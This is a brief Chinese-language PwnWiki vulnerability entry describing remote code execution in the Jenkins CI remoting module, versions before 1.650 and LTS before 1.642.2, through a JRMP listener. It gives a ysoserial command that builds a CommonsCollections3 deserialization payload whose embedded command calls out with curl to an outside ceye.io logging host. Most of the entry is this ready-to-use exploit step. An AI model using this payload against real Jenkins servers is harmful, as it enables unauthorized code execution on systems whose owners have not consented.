免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
简介
CloudBeesJenkinsCI1.650之前版本和LTS1.642.2之前版本的remoting模块中存在安全漏洞。远程攻击者可通过打开JRMP监听程序利用该漏洞执行任意代码。
利用需要X-Jenkins-CLI2-Port对应的端口,如果Jenkins无法获取CLI版本2的端口标头X-Jenkins-CLI2-Port它会退回到版本1。
利用ys生成二进制文件
java -jar ysoserial.jar CommonsCollections3 "curl http://r9rub4.ceye.io/" > payload.bin
pwnwiki.com
